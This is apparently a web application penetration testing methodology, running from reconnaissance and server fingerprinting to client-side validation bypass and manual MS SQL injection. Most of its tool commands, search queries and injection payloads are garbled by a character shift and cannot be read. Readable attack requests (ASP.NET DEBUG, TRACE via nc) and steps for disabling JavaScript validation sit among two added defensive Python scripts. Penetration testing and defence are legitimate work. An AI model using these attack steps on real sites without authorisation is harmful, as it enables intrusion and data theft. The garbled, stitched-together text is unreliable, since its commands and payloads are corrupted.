
Tactical Web Application Penetration Testing Methodology


Phase 1: Open Source Information Gathering
Phase 1a) OSINT
6RDVDARHSDRRTBG@R
4DQUDQRMHEEMDS
/DSBQ@ESBNL
%NL@HMSNNKRBNL
$DMSQ@KNORMDS
$KDYMDS
3NASDWBNL
3DFDWHMENDWHEBFH
OXSGNMFDNDCFDOXVVVS@QFDSBNLO@MXBNL
5NNK-NB@SHNM
GSSOVVVDCFDRDBTQHSXBNLRNESFDNDCFDOX
Phase 1b) Search Engine Vulnerability Quick Hits
42*%QA (NNFKDENQ42-*MIDBSHNM

QTAXRPHCQALFPEHKDSXODIRO[EHKDSXOD@RO[EHKDSXOD@ROW[EHKDSXODOGO[
EHKDSXODOK[EHKDSXODBFH[EHKDSXODQA[EHKDSXODOX[EHKDSXODCNEHKDSXOD@ROW[
EHKDSXODOGO[EHKDSXODOK[EHKDSXODBFH[EHKDSXODQA[EHKDSXODOXHMTQKS@QFDSBNLO@MXBNL
RHSDS@QFDSBNLO@MXBNLRQ
GSSORPHCQTAXENQFDNQF
(NNFKDENQFDMDQHB%@S@A@RDDQQNQR
RHSDS@QFDSBNLO@MXBNL.HBQNRNES0-&%#1QNUHCDQENQ42-4DQUDQ
RHSDS@QFDSBNLO@MXBNL.HBQNRNES+&5%@S@A@RD&MFHMD
RHSDS@QFDSBNLO@MXBNL5XODLHRL@SBG
RHSDS@QFDSBNLO@MXBNL:NTG@UD@MDQQNQHMXNTQ42-RXMS@W
RHSDS@QFDSBNLO@MXBNL*MU@KHC42-RS@SDLDMSNQ+%#$
RHSDS@QFDSBNLO@MXBNL%NQHR%TJDDQQNQ
RHSDS@QFDSBNLO@MXBNL0KD%A&WBDOSHNM
RHSDS@QFDSBNLO@MXBNL+@RODQ&WBDOSHNM
RHSDS@QFDSBNLO@MXBNL'@S@K&QQNQ
RHSDS@QFDSBNLO@MXBNLRTOOKHDC@QFTLDMSHRMNS@U@KHC.X42-
RHSDS@QFDSBNLO@MXBNLLXRPK?
RHSDS@QFDSBNLO@MXBNL0%#$
RHSDS@QFDSBNLO@MXBNL+%#$
RHSDS@QFDSBNLO@MXBNL03"
RHSDS@QFDSBNLO@MXBNL"%0%#

9444B@MOX (NNFKDENQ944

OXSGNM944RB@MOXRGSSOVVVS@QFDSBNLO@MXBNL@944VQHSD
S@QFDSBNLO@MX?WWRSWSU
GSSOVVVO@BJDSRSNQLRDBTQHSXNQF6/*9RB@MMDQR944RB@MOXSWS
4D@QBGWRRDCBNLENQSGDS@QFDSBNLO@MX
(NNFKDENQFDMDQHB3'*R
RHSDS@QFDSBNLO@MXBNLOGOEHKD
RHSDS@QFDSBNLO@MXBNLOGOENKCDQ
RHSDS@QFDSBNLO@MXBNLOGOO@SG
RHSDS@QFDSBNLO@MXBNLOGORSXKD
RHSDS@QFDSBNLO@MXBNLOGOSDLOK@SD
RHSDS@QFDSBNLO@MXBNLOGO1)1?1"5)
RHSDS@QFDSBNLO@MXBNLOGOCNB
RHSDS@QFDSBNLO@MXBNLOGOCNBTLDMS
RHSDS@QFDSBNLO@MXBNLOGOCNBTLDMS?QNNS
RHSDS@QFDSBNLO@MXBNLOGOOF
RHSDS@QFDSBNLO@MXBNLOGOOCE
4B@MENQJMNVM3'*R
OXSGNMCNQJRB@MOXS@QFDSBNLO@MXBNLCNQJKHRSSWS
GSSOVVVKD@QMRDBTQHSXNMKHMDBNLQEH?SDRSSWS
GSSOVVVC@QJBCDBNLNSGDQRCNQJ4B@MOX

(NNFKD%HFFHSX#HMF%HFFHSX
GSSOVVVRS@BGKHTBNLHMCDWOGOQDRNTQBDRSNNKRFNNFKDG@BJHMFCHFFHSXOQNIDBS
-NNJENQEHKDRSG@SFHUDTOFNNCHMENQL@SHNM
QNANSRSWS
"M@KXYDQNANSRSWSTRHMF(NNFKD8DAL@RSDQ5NNKR
(NNFKDOQNUHCDR@M"M@KXYDQNANSRSWSETMBSHNM@RO@QSNEHSR(NNFKD
8DAL@RSDQ5NNKR VGHBGB@M@RRHRSVHSGSDRSHMF
@MCSGDOQNBDCTQDHR@RENKKNVR
4HFMHMSN(NNFKD8DAL@RSDQ5NNKRVHSGXNTQ(NNFKD"BBNTMS
0MSGD%@RGAN@QC BKHBJSGD63-ENQSGDRHSDXNTV@MS
$KHBJ5NNKR @MCSGDMBKHBJ"M@KXYDQNANSRSWS
VHSGLDS@ROKNHS
LRE@TWHKH@QX QNANSR?SWS
QTM
< >4B@MMDCNEGNRSR BNLOKDSD

< ><>QNANSRSWSYQ 
LRE@TWHKH@QX QNANSR?SWS
QTM
< ><>QNANSRSWS@CLHMHRSQ@SNQ B@BGD BNLONMDMSR HL@FDR
HMBKTCDR HMRS@KK@SHNM K@MFT@FD KHAQ@QHDR LDCH@ LNCTKDR
OKTFHMR
SDLOK@SDR SLO WLKQOB

BQNRRCNL@HMWLK
OGOHMENOGO
4HSDL@OWLK
4DMCANTMBDDL@HKSN@MNMDWHRSDMS@CCQDRR@SS@QFDSBNLO@MXBNLRNXNTB@M
QD@CSGDGD@CDQHMENEQNLSGD.@HKDQ%@DLNM3DSTQMDC&L@HKQDRONMRD
:NTB@MTRT@KKXFDSSGD*1@CCQDRRNEL@HKRDQUDQSGHRV@X@MCFDS@MHCD@NESGD
HMSDQM@K*1Q@MFD

Phase 2: Platform Determination


1. Determine if the target is virtually hosted
RGQVGNHRRGGSSOVVVS@QFDSBNLO@MXBNL
GSSOO@BJDSRSNQLRDBTQHSXNQF6/*9RB@MMDQRQVGNHRRG

2. Determine if the target is load balanced


G@KADQCUGSSOVVVS@QFDSBNLO@MXBNL
GSSOG@KADQCRTODQ@CCHSHUDBNL
3. Determine if the target is protected by an IPS
NRRSLL@ECU1)551SGSSOVVVS@QFDSBNLO@MXBNLU
GSSOVVVOTQDG@BJHMFBNL@ECCNVMKN@CROGO

4. Determine if the target is protected by a WAF


V@EVEOXGSSOVVVS@QFDSBNLO@MXBNL
GSSOBNCDFNNFKDBNLOV@EEHS

5. Determine the target platform


a. Operating System: Windows, Linux

ML@OR70VVVS@QFDSBNLO@MXBNL
b. Web Server Type: IIS, Apache

Firefox Server Spy
GSSOR@CCNMRLNYHKK@NQFDM64EHQDENW@CCNM
GSSOQHMSGGSSOVVVUTKMDQ@AKDRHSDBNLRRHFM@STQDRSWS
GSSOMDSRPT@QDBNLGSSOQHMS
hmap
GSSOTIDMHLTQJXQNBBNLGL@O
Fingerprint Reference
GSSOOQNIDBSRVDA@OORDBNQF'HMFDQOQHMSHMF

c. Database Type: MSSQL, MySQL, Oracle
Fingerprint Reference
GSSOOQNIDBSRVDA@OORDBNQF'HMFDQOQHMSHMF

d. Server Side Technology Fingerprint: ASP, PHP, JSP

Extension                          Technology                              Server Platform
.pl                                Perl CGI script                         Generic; usually web servers running on Unix
.cgi                               Can be any scripting language
.py                                Python
.rb                                Ruby
.asp                               Active Server Pages                     Microsoft IIS
.aspx                              ASP+                                    Microsoft .NET
.asmx                              ASP.NET Web Service
.php                               PHP script                              Generic; usually interfaced with Apache
.cfm                               ColdFusion                              Generic; usually interfaced with Microsoft IIS
.cfml                              ColdFusion Markup Language
.nsf                               Lotus Domino                            Lotus Domino server
.jsp                               Java Server Page                        Various platforms
.jnlp                              Java WebStart File (formatted in XML)
.do                                Java Struts                             Various platforms
.php3, .php4, .php5, .phtml, .inc

PHP Easter Eggs
GSSORGHEKDSSNQFAKNFEDAOGOD@RSDQDFFR
GSSOVVVOGOBNLOGO?D@RSDQ?DFFOGO
ASP Fingerprinting
GSSOLHBG@DKC@VNQFOQNIDBSR@RO@TCHSNQU

e. Client Side Language: JavaScript, VBScript

View the website source code to determine the scripting language in use.
6. Determine if the site uses Application Pages or Functional Paths
ex: /admin/editUser.jsp vs. parameter passing as in admin.jsp?action=editUser

7. Look for server mis-configurations


* Microsoft ASP.NET Debugging Enabled
Filename: (startup.aspx)
https://<target>:443/path/startup.aspx
HTTP Attack Request:
DEBUG /path/startup.aspx HTTP/1.0
Referer: http://<ref_target>:80/
Connection: Close
Host: <target>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0)
Pragma: no-cache
Content-Length: 0
Command: stop-debug

Connection: closed
Cookie: ASPSESSIONIDAABQTDQT=CCEBGKPDCMIBMFILHDHCHJBF;
ASP.NET_SessionId=5midlh55bqdr00fcd5l2dp45
HTTP Vulnerable Response:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 09 Jul 2005 00:12:51 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2
OK

* TRACE Method Enabled


HTTP Attack Request:
$ nc www.targetcompany.com 80
TRACE / HTTP/1.1
Host: www.targetcompany.com

HTTP Vulnerable Response:


HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 31 Oct 2006 08:01:48 GMT
Connection: close
Content-Type: message/http
Content-Length: 39
TRACE / HTTP/1.1
Host: www.targetcompany.com
8. Make some manual requests for known valid and invalid resources, and
identify how the server handles them (ex. 200, 302, 404, etc.)
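As an added check that is not part of the original methodology, the following Python script shows the defender's side of items 7 and 8: it scans access-log lines for TRACE and DEBUG requests the server accepted, and classifies a raw TRACE response as enabled or disabled. The log lines, IP addresses and responses are constructed samples, and `find_risky_method_hits` and `classify_trace_response` are hypothetical names.

```python
import re

# Constructed Combined Log Format lines: one source trying the methods the
# checks above describe, against a server that still has TRACE/DEBUG enabled,
# and a second source that gets a proper 405.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Oct/2006:08:01:48 +0000] "TRACE / HTTP/1.1" 200 39
203.0.113.5 - - [31/Oct/2006:08:01:49 +0000] "DEBUG /path/startup.aspx HTTP/1.0" 200 2
203.0.113.5 - - [31/Oct/2006:08:01:50 +0000] "OPTIONS / HTTP/1.1" 200 0
198.51.100.7 - - [31/Oct/2006:08:02:10 +0000] "GET /index.html HTTP/1.1" 200 5120
198.51.100.7 - - [31/Oct/2006:08:02:11 +0000] "TRACE / HTTP/1.1" 405 0
""".splitlines()

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Methods the checks above probe for. A hardened server answers 405 or 501.
RISKY_METHODS = {"TRACE", "DEBUG"}


def parse_log_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_risky_method_hits(lines):
    """Return (method, path, status, ip) for each TRACE/DEBUG request the
    server accepted with a 2xx: evidence that the method is enabled."""
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        if rec and rec["method"] in RISKY_METHODS and 200 <= rec["status"] < 300:
            hits.append((rec["method"], rec["path"], rec["status"], rec["ip"]))
    return hits


def classify_trace_response(raw):
    """Classify a raw HTTP response to a TRACE request: 'enabled' when the
    server echoed the request back (200 with a message/http body that starts
    with the TRACE line), 'disabled' on 405/501, otherwise 'unknown'."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[1].isdigit():
        return "unknown"
    status = int(parts[1])
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip().lower()
    echoed = headers.get("content-type", "").startswith("message/http")
    if status == 200 and echoed and body.startswith("TRACE "):
        return "enabled"
    if status in (405, 501):
        return "disabled"
    return "unknown"


# Constructed responses, modelled on the vulnerable response shown above.
TRACE_ENABLED = (
    "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\nConnection: close\r\n"
    "Content-Type: message/http\r\nContent-Length: 39\r\n\r\n"
    "TRACE / HTTP/1.1\r\nHost: www.targetcompany.com\r\n"
)
TRACE_DISABLED = "HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, HEAD, POST\r\n\r\n"

if __name__ == "__main__":
    for hit in find_risky_method_hits(SAMPLE_LOG):
        print("accepted risky method:", hit)
    print(classify_trace_response(TRACE_ENABLED), classify_trace_response(TRACE_DISABLED))
```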

Phase 3: Automatic Attack Surface Mapping

1. Web Spidering and vulnerability identification with a local proxy
Spider the website with a local proxy like Paros or Burp Suite.

2. Web Spidering and vulnerability identification with an active scanner
Scan the website with a web application vulnerability scanner such as:
Commercial: Acunetix, Appscan, WebInspect, NetSparker
Open Source: w3af, Wapiti
NOTE: Be sure to do this step both with and without logging into the site.

2a. Dealing with an Open-Source CMS


VG@SVDA
BLRDWOKNQDQ

QTAXVG@SVDA@GSSOVVVS@QFDSBNLO@MXBNL
5NNK-NB@SHNM
GSSOVVVLNQMHMFRS@QRDBTQHSXBNLQDRD@QBGVG@SVDA

ODQKBLRDWOKNQDQOKTQKGSSOVVVS@QFDSBNLO@MXBNLSXODINNLK@OKTFHMR
ODQKBLRDWOKNQDQOKTQKGSSOVVVS@QFDSBNLO@MXBNLSXODINNLK@
ODQKBLRDWOKNQDQOKTQKGSSOVVVS@QFDSBNLO@MXBNLSXODINNLK@SGDLDR
ODQKBLRDWOKNQDQOKTQKGSSOVVVS@QFDSBNLO@MXBNLSXODINNLK@NRUCA[FQDO
NRUCA
:NTB@MQDOK@BDINNLK@VHSG%QTO@K 8NQCOQDRR .@LAN5GHRSNNKB@MPTDQX047%#
ATS@M"1*JDXHRQDPTHQDC:NTB@MFDSSGD047%#"1*JDXEQNLGDQDGSSONRUCANQF
@OH@ANTS
5NNK-NB@SHNM
GSSOBLRDWOKNQDQFNNFKDBNCDBNLEHKDRBLRDWOKNQDQS@QAY
6R@FD3DEDQDMBD
GSSOBNCDFNNFKDBNLOBLRDWOKNQDQVHJH6R@FD

3. Discover Hidden Content


6RD@SNNKSG@SB@MKNNJENQGHCCDMBNMSDMSRTBG@R
8DAQSOK
ODQK8DAQSOKGGSSOVVVS@QFDSBNLO@MXBNL
GSSOO@BJDSRSNQLRDBTQHSXNQF6/*9BFHRB@MMDQR8DAQSOK
%HQ#TRSDQ
GSSORNTQBDENQFDMDSOQNIDBSRCHQATRSDQ
#TQO*MSQTCDQ
GSSOONQSRVHFFDQMDSRTHSDCNVMKN@CGSLK

Phase 4: Manual Attack Surface Mapping

Phase 4a) Look for the big vulnerabilities
Browse the entire site, every single page, asking yourself the following questions:
1. Does this page or something on this page talk to a database, or another
system?
If so, test for injection vulnerabilities (SQL, XPATH, LDAP, etc.).

2. Can I or any other website user see what I type?
If so, test for XSS or similar abuse-of-trust vulnerabilities.
3. Does this page or something on this page reference a local or remote file?
If so, test for Local/Remote File Includes.
4. Does this page appear to be passing user input to a System() function or
processing a block of code that is supplied from user input?
If so, attempt command injection.

Phase 4b) Look for the less popular vulnerabilities


1. Inference from Published Content
3DUHDVSGDQDRTKSRNEXNTQTRDQCHQDBSDCAQNVRHMF@MCA@RHBAQTSDENQBD
DWDQBRHDR
*CDMSHEXM@LHMFBNMUDMSHNMRTRDC DW*EXNTRDDRNLDSGHMFKHJD
"CC%NBTLDMSIRO 7HDV%NBTLDMSIRO SGDMXNTRGNTKCKNNJENQSGHMFRKHJD
&CHSCNBTLDMSIRO @MC3DLNUD%NBTLDMSIRO

*CDMSHEXM@LHMFBNMUDMSHNMRENQRS@SHBBNMSDMS "MMT@K3DONQSOCE@MC
"MMT@K3DONQSOCE

LJCHQS@QFDSBNLO@MXCNBR
OXSGNMLDS@FNNEHKOXCVVVS@QFDSBNLO@MXBNLKE@KKN
S@QFDSBNLO@MXGSLKSS@QFDSBNLO@MXCNBR
GSSOVVVDCFDRDBTQHSXBNLLDS@FNNEHKOGO
3DUHDV@KKBKHDMSRHCDBNCDENQBKTDR DWGSLKBNLLDMSR I@U@RBQHOS
BNLLDMSRQDK@SDCSNOQNSDBSDCNQTMKHMJDCETMBSHNMR @MCGSLKCBENQLR
VHSGCHR@AKDC46#.*5DKDLDMSR
@ANTSGHCCDMRDQUDQRHCDBNMSDMS
4D@QBGENQSDLONQ@QXEHKDR DW%4?4SNQD EHKDOGO]

%NVMKN@C@MCCDBNLOHKDI@U@@OOKDSR RGNBJV@UDEHKDR @BSHUD9BNMSQNKR

%DBNLOHKDQR
I@CDDWD
+NCD@MC+4V@S
/DS3DEKDBSNQ
'K@RL

I@U@CDBNLOHKDQ

I@U@CDBNLOHKDQR

$CDBNLOHKDQ

48'AXSDBNCDCHR@RRDLAKDQ

4BQ@OD"QBGHUDNQF
GSSOVVVLDS@ROKNHSBNLLNCTKDR@TWHKH@QXRB@MMDQGSSODMTL?V@XA@BJ

2. Identify Client-Side Security Controls and attempt to bypass them


Locate all instances where hidden form fields, cookies, and URL parameters are apparently being used to transmit data via the client.
Attempt to determine or guess the purpose that the item plays in the application's logic, based on the context in which it appears and on clues such as the parameter's name.
Using a local proxy, modify the item's value in ways that are relevant to its purpose in the application. Ascertain whether the application processes arbitrary values submitted in the parameter, and whether this exposes the application to any vulnerabilities.
Details about disabling JavaScript client-side input validation
Overall Strategy: Download a local copy of the page and modify it to disable client-side controls.
1. In your browser, right click on the web page, View Source, Save As hacked.html
2. Navigate to the POST line and modify the relative path to an absolute path. This way, the page knows where to go when you post from your local hacked.html file.
If the website is called victim.com, here is what the input validation would look like:
BEFORE:
<form id="form_id" method="post" action="action.php"
onsubmit="javascript:return validate('form_id','email');">
<input type="text" id="email" name="email" />
<input type="submit" value="Submit" />
</form>
AFTER:
<form id="form_id" method="post" action="http://www.victim.com/action.php"
onsubmit="javascript:return validate('form_id','email');">
<input type="text" id="email" name="email" />
<input type="submit" value="Submit" />
</form>
3. Referring to the example from above, search for the function called validate. It will probably look similar to this:
function validate(form_id, email) {
    // Character class fixed: the original had [A-Zaz], which drops every
    // lowercase letter between b and y from the top-level domain.
    var reg = /^([A-Za-z0-9_\-\.])+\@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,4})$/;
    var address = document.forms[form_id].elements[email].value;
    if (reg.test(address) == false) {
        alert('Invalid Email Address');
        return false;   // blocks the submit in the browser only
    }
    return true;
}
4. Once the validation function has been identified, remove all validation contents so that the function only returns true:
function validate(form_id, email) {
    return true;
}
5. Open your web browser to the local copy of hacked.html and attempt SQL injection. At this point, please refer to the SQL injection tactics located in the Manual Attacks phase.
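As an added example that is not from the original document, the following Python code is the server-side counterpart to the validate() function above: the same email rule re-checked on the server, and the submitted value bound as a query parameter, so a locally edited hacked.html whose validate() returns true gains nothing. The table, the POST bodies and the handler are constructed; `handle_action` is a hypothetical stand-in for action.php.

```python
import re
import sqlite3

# Server-side copy of the rule the browser-side validate() enforces, with the
# character-class typo fixed ([A-Za-z], not [A-Zaz]).
EMAIL_RE = re.compile(r'^([A-Za-z0-9_\-\.])+@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,4})$')


def validate_email(address):
    """True only if the value matches the rule. This has to run on the server:
    a visitor can save the page as hacked.html and make validate() return true."""
    return isinstance(address, str) and EMAIL_RE.match(address) is not None


def make_db():
    """Constructed in-memory table standing in for action.php's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subscribers (email TEXT)")
    conn.execute("INSERT INTO subscribers VALUES ('alice@example.com')")
    conn.commit()
    return conn


def count_matches(conn, email):
    """Second layer: the value is bound as a parameter, so even an input that
    slipped past validation is compared as a string, never parsed as SQL."""
    cur = conn.execute("SELECT COUNT(*) FROM subscribers WHERE email = ?", (email,))
    return cur.fetchone()[0]


def handle_action(form, conn=None):
    """Hypothetical server-side handler for the form's POST to action.php:
    re-validate first, then query with a bound parameter."""
    conn = conn or make_db()
    email = form.get("email", "")
    if not validate_email(email):
        return {"status": 400, "error": "Invalid Email Address"}
    return {"status": 200, "known": count_matches(conn, email) == 1}


# Constructed POST bodies: what the unmodified form can send, and what a
# locally edited copy can send once the JavaScript check is gone.
LEGIT_POST = {"email": "alice@example.com"}
BYPASS_POST = {"email": "' OR 1=1 --"}

if __name__ == "__main__":
    print(handle_action(LEGIT_POST))    # accepted, known subscriber
    print(handle_action(BYPASS_POST))   # rejected with 400
    # Even without the validation layer, the bound parameter matches no row.
    print(count_matches(make_db(), BYPASS_POST["email"]))
```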
3. Identify session handling mechanism and attempt to abuse it
4DRRHNM1QDCHBS@AHKHSX5DRSHMF
BTQK*RGSSOVVVS@QFDSBNLO@MXBNL
ODQKFDSBNNJHDOKGSSOVVVS@QFDSBNLO@MXBNL"41/&5?4DRRHNM*CSWS
ODQKNARDRRHNMOKSWS
GSSOVVVNODMK@ARNQFNARDRRHNMS@QFY
NQ
RSNLOXGSSOVVVS@QFDSBNLO@MXBNL
GSSOKB@LSTEBNQDCTLOBWRSNLOXSFY
NQ
8DA4B@Q@A
GSSOVVVNV@RONQFHMCDWOGO$@SDFNQX08"41?8DA4B@Q@A?1QNIDBS%NVMKN@C

%DBNCD7HDVRS@SD%@S@
$ ./viewstate --decode --verbose --url=GSSOVVVS@QFDSBNLO@MXBNL
GSSOK@ARONQSBTKKHRBNTJ@OOKHB@SHNMUHDVRS@SD
GSSORNTQBDENQFDMDSOQNIDBSRUHDVRS@SD
7HDVRS@SD3DEDQDMBD
GSSOLRCMLHBQNRNESBNLDMTRKHAQ@QXLR@ROW

4. Test SSL Ciphers


ODQKRRKBHOGDQBGDBJOKVVVS@QFDSBNLO@MXBNL
GSSOVVVTMRODBHEHBBNLRRK

NQ
GSSOVVVENTMCRSNMDBNLTRQDRNTQBDROQNCCDRBRRKCHFFDQGSL
NQ
ODQKL@MXRRKOK
GSSOVVVONQSBTKKHRRDBTQHSXBNLSNNKREQDDL@MXRRKS@QFY
GSSOK@ARONQSBTKKHRBNTJ@OOKHB@SHNM.@MX44-
NQ
ML@ORBQHOSRRKUMRDO  VVVS@QFDSBNLO@MXBNL
GSSOML@ONQFMRDCNBRBQHOSRRRKUGSLK
NQ
# openssl s_client -no_tls1 -no_ssl3 -connect www.targetcompany.com:443
NQ
/DRRTR"BTMDSHWNQRHLHK@QUTKMDQ@AHKHSXRB@MMDQ

Phase 5: Manual Attacks


Manual SQL Injection (ASP/MS SQL Server)
*MSDFDQ@MC4SQHMF#@RDC*MIDBSHNM
*MSDFDQ*MIDBSHNM
GSSO<RHSD>O@FD@RO HCG@UHMF
$NKTLM<$0-6.//".&>HRHMU@KHCHMSGDRDKDBSKHRSADB@TRDHSHRMNSBNMS@HMDCHM@M
@FFQDF@SDETMBSHNM@MCSGDQDHRMN(3061#:BK@TRD

4SQHMF*MIDBSHNM
GSSO<RHSD>O@FD@RO HCWG@UHMF
$NKTLM<$0-6.//".&>HRHMU@KHCHMSGDRDKDBSKHRSADB@TRDHSHRMNSBNMS@HMDCHM@M
@FFQDF@SDETMBSHNM@MCSGDQDHRMN(3061#:BK@TRD
&MTLDQ@SHMF$NKTLM/@LDRVHSG)"7*/((3061#:$K@TRD
8GHKDVDQDNMSGDRTAIDBSNE)"7*/( HSHRONRRHAKDSNBNMSHMTDDMTLDQ@SHMF
BNKTLMM@LDREQNLSGDBTQQDMSS@AKDSG@SHRADHMFPTDQHDCTRHMFSGHRRXMS@W
GSSO<RHSD>O@FD@RO HCG@UHMF
$NKTLM<S@AKDM@LD?$0-6.//".&?>HRHMU@KHCHMSGDRDKDBSKHRSADB@TRDHSHRMNS
BNMS@HMDCHM@M@FFQDF@SDETMBSHNM@MCSGDQDHRMN(3061#:BK@TRD

GSSO<RHSD>O@FD@RO HC(3061#:S@AKDM@LD?$0-6.//".&?G@UHMF
$NKTLM<S@AKDM@LD?$0-6.//".&?>HRHMU@KHCHMSGDRDKDBSKHRSADB@TRDHSHRMNS
BNMS@HMDCHM@M@FFQDF@SDETMBSHNM@MCSGDQDHRMN(3061#:BK@TRD
GSSO<RHSD>O@FD@RO HC(3061#:S@AKDM@LD?$0-6.//".&? S@AKD
M@LD?$0-6.//".&?G@UHMF
$NKTLM<S@AKDM@LD?$0-6.//".&?>HRHMU@KHCHMSGDRDKDBSKHRSADB@TRDHSHRMNS
BNMS@HMDCHM@M@FFQDF@SDETMBSHNM@MCSGDQDHRMN(3061#:BK@TRD

&330342-*/+&$5*0/&953"$5%"5"#"4&64&3
GSSO<RHSD>O@FD@RO HCNQBNMUDQS HMS 64&3


4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<%#64&3>SN@BNKTLMNEC@S@SXODHMS

4NLDNSGDQNOSHNMR@QD
GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5TRDQ?M@LD


GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5KNFHM@LD'30.L@RSDQRXROQNBDRRDR
8)&3&ROHC!!41*%

GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5M@LD'30.L@RSDQRXRKNFHMR


&330342-*/+&$5*0/&953"$5%"5"#"4&/".&
GSSO<RHSD>O@FD@RO HCNQBNMUDQS HMS %#?/".&


4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<%#/".&>SN@BNKTLMNEC@S@SXODHMS

4NLDNSGDQNOSHNMR@QD
GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5CA?M@LD


GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5CA?M@LD
'30.L@RSDQRXROQNBDRRDR
8)&3&ROHC!!41*%


&330342-*/+&$5*0/&953"$5%"5"#"4&7&34*0/
GSSO<RHSD>O@FD@RO HCNQBNMUDQS HMS !!7&34*0/


4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<%#7&34*0/>SN@BNKTLMNEC@S@SXODHMS

4NLDNSGDQNOSHNMR@QD
GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5!!UDQRHNM


&330342-*/+&$5*0/&953"$54&37&3/".&
GSSO<RHSD>O@FD@RO HCNQBNMUDQS HMS !!4&37&3/".&


4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<4&37&3/".&>SN@BNKTLMNEC@S@SXOD
HMS

4NLDNSGDQNOSHNMR@QD
GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5!!RDQUDQM@LD


/TLADQNEBNKTLMRDMTLDQ@SHNM
6RHMF0QCDQAXSNCDSDQLHMDSGDMTLADQNEBNKTLMRHM@FHUDMPTDQXRSQHMFENQTRDVHSG
AKHMCRPKHMIDBSHNM
GSSO<RHSDBNL>O@FD@RO NQCDQAX
8GDMVDO@RR HSRGNTKCR@XTMJMNVMBNKTLMHMNQCDQAXBK@TRD8DTRDSGD
OQNBDRRNEDKHLHM@SHNMSNCDSDQLHMDSGDMTLADQNEBNKTLMR/DWSVDVNTKCG@KUDSGD
MTLADQ

GSSO<RHSDBNL>O@FD@RO NQCDQAX
"F@HMVDVNTKCFDS@MDQQNQ-DSRSQXRNLDSGHMFKHJD

GSSO<RHSDBNL>O@FD@RO NQCDQAX
8GDMVDCNSGDMTLADQ SGDPTDQXBNLOKDSDRITRSEHMD8D@QDBKNRD ATSSGDQD
LHFGSADLNQD

GSSO<RHSDBNL>O@FD@RO NQCDQAX
"MNSGDQDQQNQHMSGDNQCDQAXBK@TRD8DJMNVSGDQDHRLNQDSG@M ATSKDRRSG@M

GSSO<RHSDBNL>O@FD@RO NQCDQAX
5GHRO@RRDCITRSEHMD.HFGSADLNQD KDSRSDRS

GSSO<RHSDBNL>O@FD@RO NQCDQAX
&QQNQ5GHRLD@MRVDG@UDBNKTLMR/NVVD@QDQD@CXENQRNLDAKHMC42-HMIDBSHNM
5GDQD@RNMENQCNHMFSGHRHRADB@TRDSGDTMHNMRDKDBSPTDQXLTRSG@UDSGDR@LDMTLADQ
NEBNKTLMRVGDMRDKDBSHMFEQNL@PTDQX/NVVDQTMSGDENKKNVHMFNMSGDRHSD@MCRS@QS
SDRSHMFENQRNLDS@AKDM@LDR

&330342-*/+&$5*0/-HRS %"5"#"4&4
GSSO<RHSD>O@FD@RO
GSSO<RHSD>O@FD@RO
GSSO<RHSD>O@FD@RO
GSSO<RHSD>O@FD@RO

HC
HC
HC
HC

NQHM 4&-&$5%#?/".& 


NQHM 4&-&$5%#?/".& 


NQHM 4&-&$5%#?/".& 


NQHM 4&-&$5%#?/".& 



GSSO<RHSD>O@FD@RO HC NQHM 4&-&$5%#?/".& 


GSSO<RHSD>O@FD@RO HC NQHM 4&-&$5%#?/".& /


4NLDNSGDQNOSHNMR@QD
GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5M@LD'30.L@RSDQRXRC@S@A@RDR


&330342-*/+&$5*0/&953"$5RS %"5"#"4&5"#-&
GSSO<RHSD>O@FD@RO HCNQHM RDKDBSSNOM@LDEQNLRXRNAIDBSRVGDQD
WSXODBG@Q 


4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<5"#-&/".&>SN@BNKTLMNEC@S@SXOD
HMS

4NLDNSGDQNOSHNMR@QD
GSSO<RHSD>O@FD@RO HC NQBNMUDQS 4&-&$5M@LD'30.L@RSDQRXRNAIDBSR
8)&3&WSXOD6


&330342-*/+&$5*0/&953"$5MC%"5"#"4&5"#-&

GSSO<RHSD>O@FD@RO HCNQHM RDKDBSSNOM@LDEQNLRXRNAIDBSRVGDQD


WSXODBG@Q 
@MC M@LD5"#-&/".&

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<5"#-&/".&>SN@BNKTLMNEC@S@SXOD
HMS

4NLDNSGDQNOSHNMR@QD
GSSO<RHSD>O@FD@RO HC NQBNMUDQS 4&-&$5M@LD'30.L@RSDQRXRNAIDBSR
8)&3&WSXOD6@MCM@LD5"#-&/".&


&330342-*/+&$5*0/&953"$5QC%"5"#"4&5"#-&

